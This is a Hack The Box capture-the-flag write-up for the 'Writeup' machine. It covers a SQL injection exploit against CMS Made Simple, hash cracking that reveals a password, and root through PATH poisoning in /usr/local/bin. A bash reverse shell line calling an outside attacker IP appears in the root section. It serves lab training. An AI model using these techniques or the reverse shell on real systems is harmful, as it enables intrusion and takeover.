HTB Writeup Write-up

2 minute read

writeup

Summary


Writeup is a nice, medium difficulty machine on hackthebox, featuring the use of a publicly available sql injection exploit and a rather unique way to get root by using path poisoning.

User Flag


We start by doing a tcp port scan on the box and find the following open ports:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
|   256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_  256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/writeup/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Nothing here yet.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

On port 80 we find a website that is not giving us too much information - when we look at the output of nmap we can however see that robots.txt has an entry for /writeup/ so we go there and get the following website:

startpage

In the pages source we find a hint about the cms being used <meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved." />. We start looking for publicly available exploits and find CVE-2019-9053, a recent sql injection vulnerability that allows us to retrieve the hash of the admin password:

python solve.py -u http://10.10.10.138/writeup/
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7

To crack the hash we use hashcat and quickly recover the password:

hashcat64.exe -a0 -m20 -r rules.txt jkr.txt rockyou.txt
...
62def4866937f08cc13bab43bb14e6f7:5a599ef579066807:raykayjay9

With these credentials we can log into the box via ssh and grab the user flag.

user flag

Root Flag


Root is a bit tricky on this box. We copy over and run pspy64s and create another ssh session by logging in on another window, which shows the following code being executed:

sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new

By checking groups of our user with id we notice that we are in the staff group, which is unusual. It turns out that staff can write at “/usr/local/”, which means that if we place a binary here that is called on logging in, ours will be called instead of the usual one with root permissions. We write a simple script that can give us a root reverse shell on execution:

#!/bin/bash
bash -i >& /dev/tcp/10.10.16.46/6000 0>&1

After compiling it on our box and copying it over to “/usr/local/bin/uname” on the target, we run chmod +x to make it executable. We can use uname as a target binary because it is a program that will always be called on logging in. When logging in again we get a root shell.

root flag

Many thanks to jkr for creating this fun box. Root was really challenging for me.

Updated: